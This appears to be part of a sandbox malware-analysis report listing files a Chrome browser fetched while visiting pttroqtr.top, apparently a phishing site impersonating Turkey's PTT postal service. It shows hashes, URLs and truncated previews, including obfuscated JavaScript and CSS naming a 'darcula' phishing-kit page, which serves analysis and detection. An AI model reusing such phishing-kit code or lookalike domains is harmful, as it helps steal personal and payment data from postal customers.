                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (2711), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2711
                                                                                                                                                                                            Entropy (8bit):5.297296092227412
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:HX2Ad1LBPjwWtQkMpNbdyQNfSWsn3IQD/hACyEjJPFncz:bLlrxadFdyTWsTFyCPFncz
                                                                                                                                                                                            MD5:A75A86776204D842DB35D8ACA1B199FB
                                                                                                                                                                                            SHA1:BA065388EE5E866897DBC75E163FE916B6A35623
                                                                                                                                                                                            SHA-256:0914A1DE2F752F476BE576F73AA8EA358F8044FC0F7B6B29C76CE08853B4C889
                                                                                                                                                                                            SHA-512:CD48C0DBC2431CC20B7A1CE96BB8B87DE856C4AA69AC95B617B6F8117642F1DA16709C381D30BBADCD68897A6AE6D887D76A3D8071843BB5965EB8BB1234914A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_0xfeb21e(0x13a))/0x5*(-parseInt(_0xfeb21e(0x13e))/0x6)+-parseInt(_0xfeb21e(0x13b))/0x7+parseInt(_0xfeb21e(0x137))/0x8*(-parseInt(_0xfeb21e(0x132))/0x9)+parseInt(_0xfeb21e(0x125))/0xa*(parseInt(_0xfeb21e(0x13d))/0xb);if(_0xf4c543===_0x4b5e47)break;else _0x41d4e4['push'](_0x41d4e4['shift']());}catch(_0x4a9f2a){_0x41d4e4['push'](_0x41d4e4['shift']());}}}(a31_0x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0x20dec3=null,_0x25b304;}}:function(){};return _0xc82145=![],_0x5c3b89;};}()),a31_0x193cc0=a31_0x28e7fb(this,function(){const _0xd7d826=a
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (399)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):400
                                                                                                                                                                                            Entropy (8bit):4.876227719251662
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:UnKqKHN4h2QWu2LzDzSRJMCxkGbRjJIr9IIVQNlMyMMU2JdtTTXRXO0EOrvdVrKS:2XW4h2JT/zSRc9IoQNf++hxFEO5wXCn
                                                                                                                                                                                            MD5:2B914E8858486EAB2DCFEAA859EA8357
                                                                                                                                                                                            SHA1:B782507D4E8CEDBA35AAD5CBD1C4778115A1CB12
                                                                                                                                                                                            SHA-256:F4397CED557E01524D17B5D0988131CBF8B4C9CB5AF39749E74E3671B8EB1917
                                                                                                                                                                                            SHA-512:1416A0872268429581E96E0A8FACB8757041CF92D74F0C0A7C1897644FBC2C4422329242E6CAB50AC1CAF366CE5D3B2CE085F20BEABB17E0893AA0D3197365CF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/f4397cedkFGym.css
                                                                                                                                                                                            Preview:html,body{padding:0;border:0;margin:0}img[src="data:,"],source[src="data:,"],.sf-hidden{display:none!important}#darcula-teleport-page{position:fixed;top:0;left:0;width:100vw;height:100dvh;background-color:#fff;z-index:10}input[inputmode=numeric],input[type=tel],input[inputmode=tel],input[type=email],input[inputmode=email]{direction:ltr!important}div.button-submit button{text-transform:capitalize}.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (3653)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3701
                                                                                                                                                                                            Entropy (8bit):5.228131891228675
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:kNfY1SNf36JTAgtUNflBI3EkKHWRufQWTWDKDWDggZj2rZlVgZ1t:Ou8v6JT7+jCKHfqXnNJ
                                                                                                                                                                                            MD5:239EE53CB3C3C49D0E1B9D0D23E5DA52
                                                                                                                                                                                            SHA1:AA127BC5FD2B93B3ACA49EC673C37881094F9629
                                                                                                                                                                                            SHA-256:C05E73D2B9E70CF33428CAF11087915B75F82B2F4342048EE54B823EB2A99431
                                                                                                                                                                                            SHA-512:E0493B3844DA9B8D97837FF39218CF76F83296A6271D3B66FC1DDEBB0B5528AF37EFA0E57ADAB09246C908C0FEA0B39F74D508E6261E1B17829BAB7562FAB6B8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/css/2425cba10de1645b.css
                                                                                                                                                                                            Preview:.styles_container__uvZ2S{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(5px);-moz-backdrop-filter:blur(5px);-o-backdrop-filter:blur(5px);backdrop-filter:blur(5px);z-index:5;overflow-y:auto}.styles_container__uvZ2S>i{position:absolute;top:1.5rem;right:2rem;color:#fff;font-size:1.5rem!important}.styles_container__uvZ2S>.styles_body__Y9gTP{margin-top:4.5rem;padding:0 2rem}.styles_container__sX9Do{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(5px);-moz-backdrop-filter:blur(5px);-o-backdrop-filter:blur(5px);backdrop-filter:blur(5px);z-index:5;overflow-y:auto}.styles_container__sX9Do>.styles_inputField__2P_Kd{position:relative;margin:4rem 1rem 1rem;padding:1rem}.styles_container__sX9Do>.styles_inputField__2P_Kd>input[type=text]{background-color:#eee;width:100%;height:3rem;padding:0 9rem 0 1rem;border:none;border-radius:2rem}.styles_container__sX9Do>.styles_inputField__2P_Kd>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4546
                                                                                                                                                                                            Entropy (8bit):7.904885231107719
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:ar1jToly4eiMeo/826voWBX99AmMLGHtGNkWcebQxy:ufVR5eo/8Vvo2XYLGHYrcebQxy
                                                                                                                                                                                            MD5:F33F254A85BDD91ACA8C88DF12D99ACB
                                                                                                                                                                                            SHA1:C85F7731A9B5BD2B95394D2145B6F63B1039ACE1
                                                                                                                                                                                            SHA-256:4EC10EE6A2F0D8A0FD1E6CC0A231AEF9ED1E9447582D08795436FC33330EBC23
                                                                                                                                                                                            SHA-512:076B426C5B3C3C9D6B507300F5C504680683DD3793CEFCA18310BDE9D7210297C0567DC3B7C858B79ABBCAF2B0D16A8EC8BC81D438B923D23401F85FF902C345
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=256&q=75
                                                                                                                                                                                            Preview:RIFF....WEBPVP8X...........N..ALPHj........9......I..m[...m.v...m...R+.*..s.<q.c^.z.............z.....:i)m.n).e.{..p.Y.,C.y..N...;..s.i.o.YF.....|......>.S....../.....p>lm..g.\.B.......n...n3.7......XL...*9...68...7.<v...Z..!....S.c.!K.....\....c....,..Ra..80.1...$....+...|.h...a.....c..#.e.~...F=.-.9AM..Z.[..S|...BVk.O...b...w.~...R.$. }6.k.L..r..qT.\.Pj.\}.....Y.@.@Tk..=..a....A.M.p.%......Z.Vxf.Lz.....!D.~........5.h.H1."0%.*7.[k......N5..WO...s.!I...0'.....K1fR.g..`......I!f.....;|1.x....N.O..p....u.....B..b.._>jq.9..6.O.p..t..8.,x..Q.!K.1H./.=..m.S..3a'I..R..}<v2.,r...b....._n[o.x...t+n...&.@z{[`H.[../...$..$.?|Vp.^.r%%...D.`...k.4.;.L....BRk.Q.....:UO!W.z.;)2...=.{..G....._...S.t.J.l}~......&).R.Z.7...6`.......x..........{V.o...v..S..Y.K.T.5.2.]0..1.e..........q...F.')d..,.8....M...R....T{.........L?~..o........-....._./.."E.....b4....~...Z.Wm......k......9....>z..S..p.=....`iu..;.W)..)Ho.....pT5..r....U....'|...#...O.O
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1892), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1892
                                                                                                                                                                                            Entropy (8bit):5.3199265720505045
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:9MxFGgXen1yVqPNzTOv+Pgdxj2zRxpUky6fRK2:9MPGgYyV8NrgdV29vUkVfRK2
                                                                                                                                                                                            MD5:BD7525226CFF3D63880AB3E3783107C4
                                                                                                                                                                                            SHA1:B69F85592A127F736AD8B04F0DBB378295463C85
                                                                                                                                                                                            SHA-256:81F05B60B2139D0F055A533BDEED2E2BC3E6142A9E779A0C644455F1BBF3F9C1
                                                                                                                                                                                            SHA-512:9D33EACA3352F03C946DF20AEBA8ECB5430A0881A0150748E3C217400CD965FEE7F379D0D21FEA110BCE7EC43BE8BBD0230A2239EA453175C8900752B1B6FBA9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/c27b6911JxKnW.js
                                                                                                                                                                                            Preview:function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(){const _0xb022b5=['1002222jJEtDH','toString','254AqdTdL','__vccOpts','5ToDzfk','1085710vVxwgb','528906UwedBM','search','constructo','54xBZeip','10320728oLohLb','353TqOCxG','(((.+)+)+)','2031164WFthFE','8CvfsLG','226828xuWwpQ'];a24_0x324b=function(){return _0xb022b5;};return a24_0x324b();}(function(_0x2907ff,_0x1577d4){const _0x4680c9=a24_0x5346,_0x3fc7cd=_0x2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/0x7)+parseInt(_0x4680c9(0x6e))/0x8*(parseInt(_0x4680c9(0x70))/0x9)+-parseInt(_0x4680c9(0x75))/0xa+parseInt(_0x4680c9(0x6a))/0xb;if(_0x
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (39101), with CRLF, LF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):172590
                                                                                                                                                                                            Entropy (8bit):5.113436869391424
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:78krN709gMGFiyPG9AiSLCLk4JE+LJNJk1:Hrl09JGFiZg+k4JE+LJNJk1
                                                                                                                                                                                            MD5:FE27E9666DF98D501D80834A39E5238C
                                                                                                                                                                                            SHA1:A7E2CF51841EC650E758D0153F77A69ECF61C300
                                                                                                                                                                                            SHA-256:A243B30A3907E2913AD2E36DDD4C435AFC5267085F66B26C35972500F95D7C3E
                                                                                                                                                                                            SHA-512:96E652BE623CA48BF219D4B71EEFDA0448B20479E8917E61CC38EFEE3CB538BDC3B1E05D9F8FE7929EA326DFC5B85F1596B32E585AE12BA8074E74CEEBD5273D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.css
                                                                                                                                                                                            Preview::root{--bgColor:#f1f1f1;--pttGreenColor:#00a9ce;--pttYellowColor:#ffc72c;--pttLinkColor:#53565a;--primaryBgColor:#50a5ff;--darkPrimaryBgColor:#007cff;--secondaryBgColor:#858585;--darkSecondaryBgColor:#656565;--successBgColor:#30c781;--darkSuccessBgColor:#249b63;--dangerBgColor:#e34a4a;--darkDangerBgColor:#bd3c3c;--warningBgColor:#ffc72c;--darkWarningBgColor:#cda631;--warningFontColor:#5a4915;--infoBgColor:#41d2d9;--darkInfoBgColor:#33a7ad;--lightBgColor:#fff;--lightFontColor:#333;--lightDarkBgColor:#f1f1f1;--grayBgColor:#3d4b54;--darkGrayBgColor:#252e33;--linkBgColor:transparent;--linkFontColor:#888;--darkLinkBgColor:transparent;--modalInOutAnimation:visibility 0.2s,opacity 0.2s ease-in-out;--containerPadding:1rem 10rem;--containerHeight:calc(100vh - 145px);--borderRadius:2rem;--position:0 0 0 0;--fontWeight:600;--boxShadow:0 5px 15px -5px rgba(0,0,0,.2);--transition:all 0.2s ease-in-out;--zIndex:10}*{margin:0;padding:0;-o-box-sizing:border-box;box-sizing:border-box;font-size:.9rem;fon
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format, TrueType, length 333588, version 1.0
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):333588
                                                                                                                                                                                            Entropy (8bit):6.430983030448202
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:NH8oA4SVVuh1r/OHv6jd6d0KfECwOIZr013qpt3ww+CmQoXXQRmxp+5CQN9SW5xf:WY+nzZCSNuIz4byJ4a1u3
                                                                                                                                                                                            MD5:8D97F9CBD73C27422115CFA7202C568D
                                                                                                                                                                                            SHA1:965480AB59FE386ABC1C66DDCCC0414FA190FB7B
                                                                                                                                                                                            SHA-256:F18E42BA1B29DD596E5737E2249CE4F60F00C02B528CA762756DD0FF206037B7
                                                                                                                                                                                            SHA-512:24608338A41005BC8F3AF2D8EB67B41B50952288648707922699EDAFDCE4DBBBF54A4F7E8B6F3ABE0841751363E1836D59F110876617999707564C4E1FA8E577
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/f18e42bakFGym.woff
                                                                                                                                                                                            Preview:wOFF........................................OS/2.......`...`....cmap...h...L...L.U..gasp................glyf.......L...L{h.&head.......6...6...hhea...@...$...$...Phmtx...d........+.a.loca...|............maxp....... ... ....name.......<...<....post....... ... ...............................3...................................@.........@...@............... .........................8............. ........... ................................................79..................79..................79............... ./.>.M...#54&#"...#"....;....326=.32654&#)."....3!2654&#.!"....3!2654&#.!"....3!2654&#..............................\...........\...........\.........................................................f...............!".....3.!5265.4&#.#53.7!.!..3..*=......=*f..3......<+....ff....+<..33....g.....H..............0....1..65.4&.!.0....1..65.4&........q. ../.....q...................................................L.}...4&+."...3.3535'..#"&54632..'"......................3267>.7>.7>.54&'
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (3185)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3352
                                                                                                                                                                                            Entropy (8bit):4.914377701737588
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:uZo8/L+IJWmQq+v+dDKopvu+ztL+F/+wI+weAzT+RV+VAPsAvqeghOHHy3VzoRvO:/gA6eA2+AbdEK7pcXVxZaIJICNMM
                                                                                                                                                                                            MD5:F9250AB91F84BFC307CC3F1C2C7160A0
                                                                                                                                                                                            SHA1:A53E910029C74D8F804634C876025452FED25CEF
                                                                                                                                                                                            SHA-256:3DB5B39821A3FD830934435E760762A2A4BDE1A46BB5A47FAAE1C4A45202B2D7
                                                                                                                                                                                            SHA-512:B3DFF956882D7491593A37A4CCE28474C7E01BDC243CB76EC87FEAD18CF9B48A2325DA8A8DB07875895C62396632F6B77E00F913950D1CDE08932B29FDCFF264
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/css/owl.carousel.min.css
                                                                                                                                                                                            Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */. .owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;position:relative}.owl-carousel{display:none;width:100%;z-index:1}.owl-carousel .owl-stage{position:relative;-ms-touch-action:pan-Y;touch-action:manipulation;-moz-backface-visibility:hidden}.owl-carousel .owl-stage:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.owl-carousel .owl-stage-outer{position:relative;overflow:hidden;-webkit-transform:translate3d(0,0,0)}.owl-carousel .owl-item,.owl-carousel .owl-wrapper{-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0)}.owl-carousel .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch-c
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (6082), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):6098
                                                                                                                                                                                            Entropy (8bit):5.345197330361691
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:XLD0GPxeMvMx+DCykuvej08WkE0EPO9n4gyk8gsubpme1C8Ed0UOa3NeS9eJSrBF:v0qeMkx+DCIveU8So4gyk8gsubpme1CT
                                                                                                                                                                                            MD5:0DA448566DB5D334688029F4D8DA8025
                                                                                                                                                                                            SHA1:9AE1FA7FEE699B2E08651E38850F4B73002191F2
                                                                                                                                                                                            SHA-256:B532E6762E739AB6A28B435316707D8D90BC1CFCF1BBF430127481320C64B2ED
                                                                                                                                                                                            SHA-512:9A29CB97F174931A186F465013B04939D63E18727D31235338976365E4C35588F98EEB50ADE4B087FD90D7B79D41514D3596D9C5446760A20773CCFF26663530
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/cbcdcea5JxKnW.js
                                                                                                                                                                                            Preview:const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_0x55ba02(0x17c))/0x4*(-parseInt(_0x55ba02(0x172))/0x5)+parseInt(_0x55ba02(0x186))/0x6+-parseInt(_0x55ba02(0x185))/0x7+-parseInt(_0x55ba02(0x173))/0x8+parseInt(_0x55ba02(0x15f))/0x9;if(_0x1c2f33===_0x58f703)break;else _0x56ed15['push'](_0x56ed15['shift']());}catch(_0x3aa38c){_0x56ed15['push'](_0x56ed15['shift']());}}}(a26_0x2d8e,0xe16ee));const a26_0x523979=(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:function(){};return _0x1acf99=![],_0x24a505;};}()),a26_0x5b0a0d=a26_0x523979(this,function(){const _0x177b71=a26_0x2195;return a26_0x5b0a0d[_0x177
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (6251)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):6299
                                                                                                                                                                                            Entropy (8bit):5.275804119350307
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:wlBVCnW9nYKvjmGsxWmRxybPlH+xPVVBqmhq50xBmfxPDjRLQ2jc6:wdCnWSKv3MjGcxfB+UIBZl
                                                                                                                                                                                            MD5:22F20AFA6247DF798587ABA70C5F7BFB
                                                                                                                                                                                            SHA1:CA40F0F78FFF921142925C410027675DE1F0D967
                                                                                                                                                                                            SHA-256:762A67F772461C6E06220D94D1D196D858D74F6C1A9F27C4186361CFA0BC951F
                                                                                                                                                                                            SHA-512:E5FA88D00AD4736E931BB6CC6286F750EB263A5888F322DC52FB3A7200B90162991F15F1CD75DDB2B542113BA84FF0E0FF85D220724750FA3CE7100B5374E921
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/css/21ec1dd6e7fd01ba.css
                                                                                                                                                                                            Preview:.style_menuPanel__EhQlL{padding-left:1rem;background-color:#f8f8f8}.style_menu__geUjE{border-left:#00a6cc;background-color:#f8f8f8;position:sticky;overflow:scroll;top:0;max-height:100vh;padding:1.5rem .5rem 2rem 2rem}.style_menu__geUjE::-webkit-scrollbar{width:1rem;scroll-padding-top:20px}.style_menu__geUjE::-webkit-scrollbar-thumb{background:#e3e3e3;border-radius:100px;border:.25rem solid transparent;background-clip:content-box}.style_menu__geUjE>li{position:relative;width:95%;margin:.3rem 0 .3rem .3rem;cursor:pointer;color:var(--pttLinkColor);font-size:1rem}.style_menu__geUjE>li:after{content:"";position:absolute;left:-25px;top:0;width:20px;height:20px}.style_menu__geUjE>li i{position:absolute;top:.4rem;left:-1.4rem}.style_menu__geUjE>li>li i{position:absolute;top:.7rem;left:-1.8rem}.style_menu__geUjE>li>a>b{position:absolute;left:95%}.style_menu__geUjE>li>a{display:flex;align-items:center;padding:0 0 .5rem;width:100%;color:var(--pttLinkColor);font-size:1rem}.style_menu__geUjE>li>a:h
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1732)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1789
                                                                                                                                                                                            Entropy (8bit):4.966814738906002
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:dmhAoz1pmHXOKz1hq7RNz12OirjrJz1WBGXSz1Md+Fz1UHplZWJDMMErCBvCiz1Y:dVo7RTUjAZl18
                                                                                                                                                                                            MD5:A162C2CB4B1C97F46CA2EA02094721C1
                                                                                                                                                                                            SHA1:92A0AB61CE7EC2A8BAC3E3FB25CE90CC54458B5E
                                                                                                                                                                                            SHA-256:EDD6045FF8F42A5DAA4C68BAB8CE163C33267C5F19985CED93F3089F1BFCA36D
                                                                                                                                                                                            SHA-512:26C1E5AF5EC94744EB0116DE25DE4EBF7416F9FBFE0D6B0A3EB3D44B0C4022D0A52C54DE2D0EAAB6F22DFD91753FAF01B2658C28C366B79A203ED4A45A54CBE5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/js/reconnecting-websocket.min.js
                                                                                                                                                                                            Preview:// https://github.com/joewalnes/reconnecting-websocket/.function ReconnectingWebSocket(a){function f(g){c=new WebSocket(a);if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","attempt-connect",a)}var h=c;var i=setTimeout(function(){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","connection-timeout",a)}e=true;h.close();e=false},b.timeoutInterval);c.onopen=function(c){clearTimeout(i);if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","onopen",a)}b.readyState=WebSocket.OPEN;g=false;b.onopen(c)};c.onclose=function(h){clearTimeout(i);c=null;if(d){b.readyState=WebSocket.CLOSED;b.onclose(h)}else{b.readyState=WebSocket.CONNECTING;if(!g&&!e){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","onclose",a)}b.onclose(h)}setTimeout(function(){f(true)},b.reconnectInterval)}};c.onmessage=function(c){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSoc
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1732)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1789
                                                                                                                                                                                            Entropy (8bit):4.966814738906002
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:dmhAoz1pmHXOKz1hq7RNz12OirjrJz1WBGXSz1Md+Fz1UHplZWJDMMErCBvCiz1Y:dVo7RTUjAZl18
                                                                                                                                                                                            MD5:A162C2CB4B1C97F46CA2EA02094721C1
                                                                                                                                                                                            SHA1:92A0AB61CE7EC2A8BAC3E3FB25CE90CC54458B5E
                                                                                                                                                                                            SHA-256:EDD6045FF8F42A5DAA4C68BAB8CE163C33267C5F19985CED93F3089F1BFCA36D
                                                                                                                                                                                            SHA-512:26C1E5AF5EC94744EB0116DE25DE4EBF7416F9FBFE0D6B0A3EB3D44B0C4022D0A52C54DE2D0EAAB6F22DFD91753FAF01B2658C28C366B79A203ED4A45A54CBE5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:// https://github.com/joewalnes/reconnecting-websocket/.function ReconnectingWebSocket(a){function f(g){c=new WebSocket(a);if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","attempt-connect",a)}var h=c;var i=setTimeout(function(){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","connection-timeout",a)}e=true;h.close();e=false},b.timeoutInterval);c.onopen=function(c){clearTimeout(i);if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","onopen",a)}b.readyState=WebSocket.OPEN;g=false;b.onopen(c)};c.onclose=function(h){clearTimeout(i);c=null;if(d){b.readyState=WebSocket.CLOSED;b.onclose(h)}else{b.readyState=WebSocket.CONNECTING;if(!g&&!e){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSocket","onclose",a)}b.onclose(h)}setTimeout(function(){f(true)},b.reconnectInterval)}};c.onmessage=function(c){if(b.debug||ReconnectingWebSocket.debugAll){console.debug("ReconnectingWebSoc
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1798)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1857
                                                                                                                                                                                            Entropy (8bit):5.4512281174258765
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:fbjT4XvxAU7+rbdqI152lNGqS6aLeV6L5cmMY8MDgWLMR6wZ4b7ZylJeBgqwmXId:fbAfxADbA2eV6WJYPDOEw2fQUJO
                                                                                                                                                                                            MD5:F7E305DB554FB297C2B9CA10143123D9
                                                                                                                                                                                            SHA1:2CBB34D49DA602130B3157E4A60706500E96DF4B
                                                                                                                                                                                            SHA-256:E5030F6870EAAC3E3B54D88017D74E870CE04EB42F47D0C883CA2099E8932C35
                                                                                                                                                                                            SHA-512:5B79BFB406626FD17CA43952B5BCD6D0C92266B00662C25D68C6EDF4C8275F1A134F1F9899EF4792F094A7CA97B3B7DC828E67997EC94F65A4A28CA69D984468
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/pages/doviz-kurlari-5a26b114db728c07.js
